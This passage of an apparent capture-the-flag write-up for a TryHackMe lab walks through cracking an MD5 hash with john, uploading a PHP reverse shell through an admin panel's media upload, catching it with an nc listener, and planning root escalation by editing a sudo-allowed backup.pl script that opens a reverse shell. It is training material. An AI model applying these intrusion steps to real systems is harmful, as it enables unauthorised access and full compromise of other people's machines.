Now we can use john to crack the hash and obtain the password.
$ john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=3
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (?)
1g 0:00:00:00 DONE (2023-12-12 09:57) 3.448g/s 115862p/s 115862c/s 115862C/s coco21..181193
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
If we go to the /content/as page we will come across a login form which we can login to using the following credentials:
Now that we are in the admin panel, we can start looking for some exploits.
We can obtain a reverse shell from the Revshells page.
Once we have it stored in a file, we can upload the file in the Media Center of the admin panel with a php5 extension.
Next, we have to set up a nc listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
Then we can visit the /content/attachment/ page to access our exploit.
Let's check our listener.
$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.17.48.138] from (UNKNOWN) [10.10.37.233] 60656
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
07:02:32 up 1:22, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Let's check what commands our user can execute as root using the sudo -l command.
$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on THM-Chal:
(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
So we can run the backup.pl script as root without any password. Let's check what the script does.
So it establishes a reverse shell to 192.168.0.190 on port 5554. We can replace the IP and port to our own so that the reverse shell connection is sent to us.